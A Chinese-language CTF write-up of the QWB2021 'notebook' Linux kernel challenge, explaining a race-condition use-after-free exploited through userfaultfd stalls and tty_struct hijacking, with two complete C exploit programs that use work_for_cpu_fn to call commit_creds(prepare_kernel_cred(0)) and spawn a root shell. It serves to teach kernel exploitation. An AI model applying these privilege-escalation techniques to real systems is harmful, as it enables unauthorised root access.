QWB2021-notebook-WP

Posted on Jul 15, 2021

强网杯的时候我还一点都不会 kernel pwn,这道题看都没看。这两天尝试复现了一下,从前天下午一直弄到现在才搞出来,费了不少时间,也学到了一些东西,特别地,学习到了之前学习 userfaultfd 和 tty attack 时一些自己不知道自己不知道的知识(这里没有打错哦 ^_^)。

首先看一下启动脚本

#!/bin/sh
stty intr ^]
qemu-system-x86_64 \
    -m 64M \
    -kernel bzImage \
    -initrd rootfs.cpio \
    -append "loglevel=3 console=ttyS0 oops=panic panic=1 kaslr" \
    -nographic -net user -net nic -device e1000 \
    -smp cores=2,threads=2 -cpu kvm64,+smep,+smap \
    -monitor /dev/null 2>/dev/null -s

append 时把 loglevel 开到了 3,建议把这个去掉,调试起来会好判断一点(可以看到驱动 printk 的内容)。

然后 run 一下,发现启动要 20 秒左右,非常的慢,让我很不爽,我也不知道具体是什么造成的,反正和 etc 文件夹里面的东西有关,打包的时候可以先不把这个文件夹打进去,可以少浪费一些生命。

程序的流程比较简单,也没有去符号,这里就不分析了。程序主要的漏洞就是条件竞争造成的 UAF。

首先先说一下读写锁,之前学操作系统的时候没有特别全面,不了解读写锁的特性,导致昨天一天都无法理解为什么不能按照预想的情况竞争。其实读写锁还是很好理解的,其性质为

  • 当写锁被取走时,所有取锁操作被阻塞
  • 当读锁被取走时,取写锁的操作被阻塞

恰当的使用读写锁可以在提高程序性能的前提下保证线程同步。题目中的驱动程序在 noteedit 和 noteadd 操作中取了读锁,仅在 notedel 操作中取了写锁。其余操作都没有锁保护。而两个取读锁的操作实际上都有写操作,但是他们又是可以并发的,这样就很可能存在条件竞争的漏洞。

这是 noteedit 操作的部分代码,这里的 krealloc 并未对 newsize 做任何限制。同时并没有及时更新 note 指针,反而在更新前加入了 copy_from_user 的操作,那么就可以考虑通过 userfaultfd 操作卡死当前线程,避免 note 的更新,这样就可以保留一个被 kfree 的 slab 的指针。这样操作的问题是 note 的 size 被更新为了 0,之后 read 和 write 操作就无法读写数据了。

不过在 add 操作时,也类似的在更新 size 前加入了 copy_from_user 的操作,我们也可以把线程卡死在这里,把 size 改为 0x60。

因此,我们可以做到

  • 申请任意大小的 slab。虽然 add 操作限制了 size 最大为 0x60,但是通过 edit 可以 krealloc 出任意大小的 slab
  • UAF 任意大小的 slab。不过只能控制前 0x60 字节的数据

那么利用方法就是,首先通过 UAF 实现对一个 tty_struct 的前 0x60 字节的任意读写,leak 出内核地址。然后可以做 rop,但是在看长亭的 WP 时,学到了一个很有趣的 trick,原文链接。这里引用原文

控制 rip 之后,下一步就是绕过 SMEP 和 SMAP 了,这里介绍一种在完全控制了 tty 对象的情况下非常好用的 trick,完全不用 ROP,非常简单,且非常稳定(我们的 exploit 在利用成功和可以正常退出程序,甚至关机都不会触发 kernel panic)。

内核中有这样的一个函数:

img

其编译后大概长这样:

img

该函数位于 workqueue 机制的实现中,只要是开启了多核支持的内核 (CONFIG_SMP)都会包含这个函数的代码。不难注意到,这个函数非常好用,只要能控制第一个参数指向的内存,即可实现带一个任意参数调用任意函数,并把返回值存回第一个参数指向的内存的功能,且该 “gadget” 能干净的返回,执行的过程中完全不用管 SMAP、SMEP 的事情。由于内核中大量的 read / write / ioctl 之类的实现的第一个参数也都恰好是对应的对象本身,可谓是非常的适合这种场景了。考虑到我们提权需要做的事情只是 commit_creds(prepare_kernel_cred(0)),完全可以用两次上述的函数调用原语实现。(如果还需要禁用 SELinux 之类的,再找一个任意地址写 0 的 gadget 即可,很容易找)

利用这个原语就可以比较容易的任意函数执行了。

7.15 的失败尝试

根据之前的分析和小 trick,我有了自己的 exp

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <syscall.h>
#include <poll.h>
#include <unistd.h>
#include <pthread.h>
#include <string.h>
#include <stdint.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <assert.h>

#define PAGE_SIZE 0x1000
#define TTY_STRUCT_SZIE 0x2E0

size_t work_for_cpu_fn_off = 0xffffffff8949eb90 - 0xffffffff8a28e440;
size_t prepare_kernel_cred_off = 0xffffffffa14a9ef0 - 0xffffffffa228e440;
size_t commit_creds_off = 0xffffffffa14a9b40 - 0xffffffffa228e440;

struct userarg
{
	size_t idx;
	size_t size;
	void* buf;
};

int note_fd;
void* stuck_mapped_memory;

void ErrExit(char* err_msg)
{
	puts(err_msg);
	exit(-1);
}

void RegisterUserfault(void *fault_page, void* handler)
{
	pthread_t thr;
	struct uffdio_api ua;
	struct uffdio_register ur;
	uint64_t uffd  = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
	ua.api = UFFD_API;
	ua.features    = 0;
	if (ioctl(uffd, UFFDIO_API, &ua) == -1)
		ErrExit("[-] ioctl-UFFDIO_API");

	ur.range.start = (unsigned long)fault_page; //我们要监视的区域
	ur.range.len   = PAGE_SIZE;
	ur.mode        = UFFDIO_REGISTER_MODE_MISSING;
	if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1) //注册缺页错误处理,当发生缺页时,程序会阻塞,此时,我们在另一个线程里操作
		ErrExit("[-] ioctl-UFFDIO_REGISTER");
	//开一个线程,接收错误的信号,然后处理
	int s = pthread_create(&thr, NULL,handler, (void*)uffd);
	if (s!=0)
		ErrExit("[-] pthread_create");
}

void noteadd(size_t idx, size_t size, void* buf)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = size;
	notearg.buf = buf;
	ioctl(note_fd, 0x100, &notearg);
}

void notegift(void* buf)
{
	struct userarg notearg;
	notearg.idx = 0;
	notearg.size = 0;
	notearg.buf = buf;
	ioctl(note_fd, 0x64, &notearg);
}

void notedel(size_t idx)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = 0;
	notearg.buf = NULL;
	ioctl(note_fd, 0x200, &notearg);
}

void noteedit(size_t idx, size_t size, void* buf)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = size;
	notearg.buf = buf;
	ioctl(note_fd, 0x300, &notearg);
}

void OpenNote()
{
	note_fd = open("/dev/notebook", O_RDWR);
	if (note_fd < 0)
	{
		ErrExit("[-] err in open notebook device");
	}
}

void* userfaultfd_sleep3_handler(void* arg)
{
	struct uffd_msg msg;
	unsigned long uffd = (unsigned long) arg;
	puts("[+] sleep3 handler created");
	int nready;
	struct pollfd pollfd;
	pollfd.fd = uffd;
	pollfd.events = POLLIN;
	nready = poll(&pollfd, 1, -1);
	puts("[+] sleep3 handler unblocked");
	sleep(3);
	if (nready != 1)
	{
		ErrExit("[-] Wrong poll return val");
	}
	nready = read(uffd, &msg, sizeof(msg));
	if (nready <= 0)
	{
		ErrExit("[-] msg err");
	}

	char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (page == MAP_FAILED)
	{
		ErrExit("[-] mmap err");
	}
	struct uffdio_copy uc;
	// init page
	memset(page, 0, sizeof(page));
	uc.src = (unsigned long) page;
	uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
	uc.len = PAGE_SIZE;
	uc.mode = 0;
	uc.copy = 0;
	ioctl(uffd, UFFDIO_COPY, &uc);
	puts("[+] sleep3 handler done");
	return NULL;
}

void* userfaultfd_stuck_handler(void* arg)
{
	struct uffd_msg msg;
	unsigned long uffd = (unsigned long) arg;
	puts("[+] stuck handler created");
	int nready;
	struct pollfd pollfd;
	pollfd.fd = uffd;
	pollfd.events = POLLIN;
	nready = poll(&pollfd, 1, -1);
	puts("[+] stuck handler unblocked");
	pause();
	if (nready != 1)
	{
		ErrExit("[-] Wrong poll return val");
	}
	nready = read(uffd, &msg, sizeof(msg));
	if (nready <= 0)
	{
		ErrExit("[-] msg err");
	}

	char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (page == MAP_FAILED)
	{
		ErrExit("[-] mmap err");
	}
	struct uffdio_copy uc;
	// init page
	memset(page, 0, sizeof(page));
	uc.src = (unsigned long) page;
	uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
	uc.len = PAGE_SIZE;
	uc.mode = 0;
	uc.copy = 0;
	ioctl(uffd, UFFDIO_COPY, &uc);
	puts("[+] stuck handler done");
	return NULL;
}

void* edit_thread(int idx)
{
	puts("[+] edit thread start!");
	noteedit(idx, 0, stuck_mapped_memory);
	puts("[+] edit thread end!"); // won't reach here
	return NULL;
}

void* add_thread(int idx)
{
	puts("[+] add thread start!");
	noteadd(idx, 0x60, stuck_mapped_memory);
	puts("[+] add thread end!"); // won't reach here
	return NULL;
}

char buf_a[0x500] = {"aaa"};
size_t buf_tty[0x100], buf_fake_table[0x500];

int main()
{
	int pid;
	int tty_fd;

	stuck_mapped_memory = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
	RegisterUserfault(stuck_mapped_memory, userfaultfd_stuck_handler);

	OpenNote();

	noteadd(0, 0x60, buf_a);
	noteedit(0, TTY_STRUCT_SZIE, buf_a);
	write(note_fd, buf_a, 0);


	pthread_t thr_edit, thr_add;
	pthread_create(&thr_edit, NULL, edit_thread, 0);
	sleep(1);
	pthread_create(&thr_add, NULL, add_thread, 0);
	sleep(1);
	puts("ready to open ptmx");
	for (int i = 0; i < 20; i++)
	{
		tty_fd = open("/dev/ptmx", O_RDWR);
		if (tty_fd < 0)
		{
			ErrExit("[-] ptmx open failed!");
		}
		read(note_fd, buf_tty, 0);
		if (buf_tty[0] == 0x100005401)
		{
			printf("[+] tty_struct found! fd = %d\n", tty_fd);
			break; // tty_struct used our slab
		}
	}
	if (buf_tty[0] != 0x100005401)
	{
		ErrExit("[-] leak failed");
	}

	size_t ptm_unix98_ops_addr = buf_tty[3];
	size_t work_for_cpu_fn_addr =  work_for_cpu_fn_off + ptm_unix98_ops_addr;
	size_t tty_struct_addr = buf_tty[10] - 0x50;
	size_t commit_creds_addr = commit_creds_off + ptm_unix98_ops_addr;
	size_t prepare_kernel_cred_addr = prepare_kernel_cred_off + ptm_unix98_ops_addr;

	printf("[+] ptm_unix98_ops addr leaked, addr: 0x%lx\n", ptm_unix98_ops_addr);
	printf("[+] work_for_cpu_fn addr leaked, addr: 0x%lx\n", work_for_cpu_fn_addr);
	printf("[+] tty_struct addr leaked, addr: 0x%lx\n", tty_struct_addr);

	write(tty_fd, 1, 1);

	size_t buf_gift[0x100];
	notegift(buf_gift);
	size_t note_0_addr = buf_gift[0 * 2];
	assert(note_0_addr == tty_struct_addr);

	buf_tty[3] = tty_struct_addr;
	buf_tty[4] = prepare_kernel_cred_addr;
	buf_tty[5] = 0;
	buf_tty[7] = work_for_cpu_fn_addr;
	write(note_fd, buf_tty, 0); // write to tty_struct

	write(tty_fd, 0, 0);

	read(note_fd, buf_tty, 0);
	printf("[+] prepare_kernel_cred finished, return 0x%lx\n", buf_tty[6]);
	buf_tty[3] = tty_struct_addr;
	buf_tty[4] = commit_creds_addr;
	buf_tty[5] = buf_tty[6];
	buf_tty[7] = work_for_cpu_fn_addr;
	write(note_fd, buf_tty, 0);
	sleep(1);
	puts("[+] write tty finished (second time)");
	write(tty_fd, 0, 0);

	printf("now uid = %d\n", getuid());

	if (getuid() == 0)
	{
		puts("[+] root now!");
		system("/bin/sh");
	}
	else
	{
		exit(-1);
	}

	return 0;
}

比较奇怪的是我在修改了虚表后执行 write 并无法取得我想要的效果,使用 gdb attach 上去下断点也断不下来,非常的奇怪,明天再研究研究。

另外 slub 的机制让我有点迷惑,他似乎不是后进先出的,所以在 open ptmx 的时候需要多次 open,我通过魔数来判断是否申请到了我们 UAF 的 slab。

7.16 终于复现成功

昨天碰到的问题在今天终于部分解决了。首先是 leak 的小问题,leak 时使用的数据是结构体的虚表,这张虚表可能是 ptm_unix98_ops,也可能是 pty_unix98_ops,两者只差了 0x120,所以特判一下就可以实现 leak,也就是

if ((ptm_unix98_ops_addr & 0xFFF) == 0x320) ptm_unix98_ops_addr += 0x120;

然后是碰到即便修改了虚表后,调用 write 也无法执行 work_for_cpu_fn 函数的问题。我一直以为这里 write 的逻辑,用面向对象的思维来看就是直接调用 tty_struct 类重写的 write 虚函数,类似于 _IO_FILE 劫持虚表中的 write 指针后 write 就会直接执行劫持的函数的逻辑了。但是实际上不是这样的,在掉用虚表中函数指针前会先调用 tty_write 函数

static ssize_t tty_write(struct file *file, const char __user *buf,
						size_t count, loff_t *ppos)
{
	struct tty_struct *tty = file_tty(file);
 	struct tty_ldisc *ld;
	ssize_t ret;

	if (tty_paranoia_check(tty, file_inode(file), "tty_write"))
		return -EIO;
	if (!tty || !tty->ops->write ||	tty_io_error(tty))
			return -EIO;
	/* Short term debug to catch buggy drivers */
	if (tty->ops->write_room == NULL)
		tty_err(tty, "missing write_room method\n");
	ld = tty_ldisc_ref_wait(tty);
	if (!ld)
		return hung_up_tty_write(file, buf, count, ppos);
	if (!ld->ops->write)
		ret = -EIO;
	else
		ret = do_tty_write(ld->ops->write, tty, file, buf, count);
	tty_ldisc_deref(ld);
	return ret;
}

然后到 do_tty_write 中再进行用户态数据的拷贝,最后才实际调用函数指针

static inline ssize_t do_tty_write(
	ssize_t (*write)(struct tty_struct *, struct file *, const unsigned char *, size_t),
	struct tty_struct *tty,
	struct file *file,
	const char __user *buf,
	size_t count)
{
	ssize_t ret, written = 0;
	unsigned int chunk;

	ret = tty_write_lock(tty, file->f_flags & O_NDELAY);
	if (ret < 0)
		return ret;

	/*
	 * We chunk up writes into a temporary buffer. This
	 * simplifies low-level drivers immensely, since they
	 * don't have locking issues and user mode accesses.
	 *
	 * But if TTY_NO_WRITE_SPLIT is set, we should use a
	 * big chunk-size..
	 *
	 * The default chunk-size is 2kB, because the NTTY
	 * layer has problems with bigger chunks. It will
	 * claim to be able to handle more characters than
	 * it actually does.
	 *
	 * FIXME: This can probably go away now except that 64K chunks
	 * are too likely to fail unless switched to vmalloc...
	 */
	chunk = 2048;
	if (test_bit(TTY_NO_WRITE_SPLIT, &tty->flags))
		chunk = 65536;
	if (count < chunk)
		chunk = count;

	/* write_buf/write_cnt is protected by the atomic_write_lock mutex */
	if (tty->write_cnt < chunk) {
		unsigned char *buf_chunk;

		if (chunk < 1024)
			chunk = 1024;

		buf_chunk = kmalloc(chunk, GFP_KERNEL);
		if (!buf_chunk) {
			ret = -ENOMEM;
			goto out;
		}
		kfree(tty->write_buf);
		tty->write_cnt = chunk;
		tty->write_buf = buf_chunk;
	}

	/* Do the write .. */
	for (;;) {
		size_t size = count;
		if (size > chunk)
			size = chunk;
		ret = -EFAULT;
		if (copy_from_user(tty->write_buf, buf, size))
			break;
		ret = write(tty, file, tty->write_buf, size);
		if (ret <= 0)
			break;
		written += ret;
		buf += ret;
		count -= ret;
		if (!count)
			break;
		ret = -ERESTARTSYS;
		if (signal_pending(current))
			break;
		cond_resched();
	}
	if (written) {
		tty_update_time(&file_inode(file)->i_mtime);
		ret = written;
	}
out:
	tty_write_unlock(tty);
	return ret;
}

这一路上要经过一些检测和各种各样操作,昨天我使用

write(tty_fd, 0, 0);

这样的方法调用,一下子就会挂在 copy_from_user 上,此处需要提供一个正确的 buf,和一定的长度,比如

write(tty_fd, buf_a, 1);

这样就可以调用到劫持的 work_for_cpu_fn 了。

由于 work_for_cpu_fn 的参数由 write 调用的第一个参数决定,也就是 tty_struct 本身,那么被调函数偏移在 0x20,这个没什么问题

buf_tty[4] = prepare_kernel_cred_addr;

这样就可以了,然后第一个参数在偏移 0x28 处,也就是

buf_tty[5] = 0;

看似没什么问题,但是之后执行到 work_for_cpu_fn 时偏移 0x28 会莫名其妙的变成 1,导致执行 kernel_prepare_cred 时出错,估计是 tty_write 和 do_tty_write 操作中对此处的成员变量进行了操作(变量本身是一个信号量,这里可能是为了线程同步之类的有一点改变)。

如果用虚表做 ROP 的话不需要考虑对别的变量的修改,因为不需要考虑参数的问题,但是用 work_for_cpu_fn 来进行函数调用时就需要小心一点了,所以最后我还是根据长亭的 WP 换成了 ioctl 来触发。类似的,在调用函数指针前也先调用了 tty_ioctl,这个函数是一个较为巨大的 switch 结构,所以给予的 cmd 的值要比较小心,我尝试了一些随机数都无法达到效果,最后还是根据长亭 WP 用的 233 实现的,也就是

ioctl(tty_fd, 233, 233);

这样调用。看来 233 这个数确实还是有一些魔力。

最后的 exp

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <syscall.h>
#include <poll.h>
#include <unistd.h>
#include <pthread.h>
#include <string.h>
#include <stdint.h>
#include <linux/userfaultfd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <assert.h>

#define PAGE_SIZE 0x1000
#define TTY_STRUCT_SZIE 0x2E0

size_t work_for_cpu_fn_off = 0xffffffff8949eb90 - 0xffffffff8a28e440;
size_t prepare_kernel_cred_off = 0xffffffffa14a9ef0 - 0xffffffffa228e440;
size_t commit_creds_off = 0xffffffffa14a9b40 - 0xffffffffa228e440;
size_t kernel_base;

struct userarg
{
	size_t idx;
	size_t size;
	void* buf;
};

int note_fd;
void* stuck_mapped_memory;

void ErrExit(char* err_msg)
{
	puts(err_msg);
	exit(-1);
}

void RegisterUserfault(void *fault_page, void* handler)
{
	pthread_t thr;
	struct uffdio_api ua;
	struct uffdio_register ur;
	uint64_t uffd  = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK);
	ua.api = UFFD_API;
	ua.features    = 0;
	if (ioctl(uffd, UFFDIO_API, &ua) == -1)
		ErrExit("[-] ioctl-UFFDIO_API");

	ur.range.start = (unsigned long)fault_page; //我们要监视的区域
	ur.range.len   = PAGE_SIZE;
	ur.mode        = UFFDIO_REGISTER_MODE_MISSING;
	if (ioctl(uffd, UFFDIO_REGISTER, &ur) == -1) //注册缺页错误处理,当发生缺页时,程序会阻塞,此时,我们在另一个线程里操作
		ErrExit("[-] ioctl-UFFDIO_REGISTER");
	//开一个线程,接收错误的信号,然后处理
	int s = pthread_create(&thr, NULL,handler, (void*)uffd);
	if (s!=0)
		ErrExit("[-] pthread_create");
}

void noteadd(size_t idx, size_t size, void* buf)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = size;
	notearg.buf = buf;
	ioctl(note_fd, 0x100, &notearg);
}

void notegift(void* buf)
{
	struct userarg notearg;
	notearg.idx = 0;
	notearg.size = 0;
	notearg.buf = buf;
	ioctl(note_fd, 0x64, &notearg);
}

void notedel(size_t idx)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = 0;
	notearg.buf = NULL;
	ioctl(note_fd, 0x200, &notearg);
}

void noteedit(size_t idx, size_t size, void* buf)
{
	struct userarg notearg;
	notearg.idx = idx;
	notearg.size = size;
	notearg.buf = buf;
	ioctl(note_fd, 0x300, &notearg);
}

void OpenNote()
{
	note_fd = open("/dev/notebook", O_RDWR);
	if (note_fd < 0)
	{
		ErrExit("[-] err in open notebook device");
	}
}

void* userfaultfd_sleep3_handler(void* arg)
{
	struct uffd_msg msg;
	unsigned long uffd = (unsigned long) arg;
	puts("[+] sleep3 handler created");
	int nready;
	struct pollfd pollfd;
	pollfd.fd = uffd;
	pollfd.events = POLLIN;
	nready = poll(&pollfd, 1, -1);
	puts("[+] sleep3 handler unblocked");
	sleep(3);
	if (nready != 1)
	{
		ErrExit("[-] Wrong poll return val");
	}
	nready = read(uffd, &msg, sizeof(msg));
	if (nready <= 0)
	{
		ErrExit("[-] msg err");
	}

	char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (page == MAP_FAILED)
	{
		ErrExit("[-] mmap err");
	}
	struct uffdio_copy uc;
	// init page
	memset(page, 0, sizeof(page));
	uc.src = (unsigned long) page;
	uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
	uc.len = PAGE_SIZE;
	uc.mode = 0;
	uc.copy = 0;
	ioctl(uffd, UFFDIO_COPY, &uc);
	puts("[+] sleep3 handler done");
	return NULL;
}

void* userfaultfd_stuck_handler(void* arg)
{
	struct uffd_msg msg;
	unsigned long uffd = (unsigned long) arg;
	puts("[+] stuck handler created");
	int nready;
	struct pollfd pollfd;
	pollfd.fd = uffd;
	pollfd.events = POLLIN;
	nready = poll(&pollfd, 1, -1);
	puts("[+] stuck handler unblocked");
	pause();
	if (nready != 1)
	{
		ErrExit("[-] Wrong poll return val");
	}
	nready = read(uffd, &msg, sizeof(msg));
	if (nready <= 0)
	{
		ErrExit("[-] msg err");
	}

	char* page = (char*) mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
	if (page == MAP_FAILED)
	{
		ErrExit("[-] mmap err");
	}
	struct uffdio_copy uc;
	// init page
	memset(page, 0, sizeof(page));
	uc.src = (unsigned long) page;
	uc.dst = (unsigned long) msg.arg.pagefault.address & ~(PAGE_SIZE - 1);
	uc.len = PAGE_SIZE;
	uc.mode = 0;
	uc.copy = 0;
	ioctl(uffd, UFFDIO_COPY, &uc);
	puts("[+] stuck handler done");
	return NULL;
}

void* edit_thread(int idx)
{
	puts("[+] edit thread start!");
	noteedit(idx, 0, stuck_mapped_memory);
	puts("[+] edit thread end!"); // won't reach here
	return NULL;
}

void* add_thread(int idx)
{
	puts("[+] add thread start!");
	noteadd(idx, 0x60, stuck_mapped_memory);
	puts("[+] add thread end!"); // won't reach here
	return NULL;
}

char buf_a[0x500] = {"aaa"};
size_t buf_tty[0x100], buf_fake_table[0x500];

int main()
{
	int pid;
	int tty_fd;

	stuck_mapped_memory = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
	RegisterUserfault(stuck_mapped_memory, userfaultfd_stuck_handler);

	OpenNote();

	noteadd(0, 0x60, buf_a);
	noteadd(1, 0x60, buf_a);
	noteedit(1, 0x500, buf_a);
	noteedit(0, TTY_STRUCT_SZIE, buf_a);
	write(note_fd, buf_a, 0);


	pthread_t thr_edit, thr_add;
	pthread_create(&thr_edit, NULL, edit_thread, 0);
	sleep(1);
	pthread_create(&thr_add, NULL, add_thread, 0);
	sleep(1);
	puts("ready to open ptmx");
	for (int i = 0; i < 20; i++)
	{
		tty_fd = open("/dev/ptmx", O_RDWR);
		if (tty_fd < 0)
		{
			ErrExit("[-] ptmx open failed!");
		}
		read(note_fd, buf_tty, 0);
		if (buf_tty[0] == 0x100005401)
		{
			printf("[+] tty_struct found! fd = %d\n", tty_fd);
			break; // tty_struct used our slab
		}
	}
	if (buf_tty[0] != 0x100005401)
	{
		ErrExit("[-] leak failed");
	}

	size_t ptm_unix98_ops_addr = buf_tty[3];
	if ((ptm_unix98_ops_addr & 0xFFF) == 0x320) ptm_unix98_ops_addr += 0x120;
	size_t work_for_cpu_fn_addr =  work_for_cpu_fn_off + ptm_unix98_ops_addr;
	size_t tty_struct_addr = buf_tty[10] - 0x50;
	size_t commit_creds_addr = commit_creds_off + ptm_unix98_ops_addr;
	size_t prepare_kernel_cred_addr = prepare_kernel_cred_off + ptm_unix98_ops_addr;
	kernel_base = prepare_kernel_cred_addr - 0xA9EF0;

	printf("[+] ptm_unix98_ops addr leaked, addr: 0x%lx\n", ptm_unix98_ops_addr);
	printf("[+] work_for_cpu_fn addr leaked, addr: 0x%lx\n", work_for_cpu_fn_addr);
	printf("[+] prepare_kernel_cred addr leaked, addr: 0x%lx\n", prepare_kernel_cred_addr);
	printf("[+] tty_struct addr leaked, addr: 0x%lx\n", tty_struct_addr);

	size_t buf_gift[0x100];
	notegift(buf_gift);
	size_t note_0_addr = buf_gift[0 * 2];
	size_t note_1_addr = buf_gift[1 * 2];
	assert(note_0_addr == tty_struct_addr);
	printf("[+] note_1 addr leaked, addr: 0x%lx\n", note_1_addr);

	buf_tty[0] = 0x100005401;
	buf_tty[3] = note_1_addr;
	buf_tty[4] = prepare_kernel_cred_addr;
	buf_tty[5] = 0;
	write(note_fd, buf_tty, 0); // write to tty_struct

	buf_fake_table[7] = work_for_cpu_fn_addr;
	buf_fake_table[10] = work_for_cpu_fn_addr;
	buf_fake_table[12] = work_for_cpu_fn_addr;
	write(note_fd, buf_fake_table, 1);

	// write(tty_fd, buf_a, 1);
	ioctl(tty_fd, 233, 233);

	read(note_fd, buf_tty, 0);
	printf("[+] prepare_kernel_cred finished, return 0x%lx\n", buf_tty[6]);

	buf_tty[0] = 0x100005401;
	buf_tty[3] = note_1_addr;
	buf_tty[4] = commit_creds_addr;
	buf_tty[5] = buf_tty[6];
	write(note_fd, buf_tty, 0);
	sleep(1);

	// write(tty_fd, buf_a, 1);
	ioctl(tty_fd, 233, 233);

	printf("now uid = %d\n", getuid());

	if (getuid() == 0)
	{
		puts("[+] root now!");
		system("/bin/sh");
	}
	else
	{
		exit(-1);
	}

	return 0;
}

顺带提一下我如何发现会先调用 tty_write 的,因为有一次尝试时我把 exp 中的 buf_tty 先清零了再写回到 tty_struct,然后再做 wirte 操作,想看看是不是成员变量会影响调用,结果触发了 kernel panic,错误信息是 magic num 不对。这让我觉得有点奇怪,work_for_cpu_fn 里面肯定不会检测魔数,所以就仔细看了一下 panic 时一闪即过的错误信息,发现函数调用回溯中有 tty_write 这个函数,就把源码拿来看了看,才知道自己的错误。

最后总结一下,其实这道题并不算难,逆向难度不大,思路也很明显,就是条件竞争 UAF,然后可以利用 work_for_cpu_fn 便捷地提权,事实上 tty attack rop 和劫持 modprobe_path 都是可用的方法。不过我这里就不用他们复现了。

slub 的分配机制还是有必要再研究一下,客观来说还是有点令我迷惑的。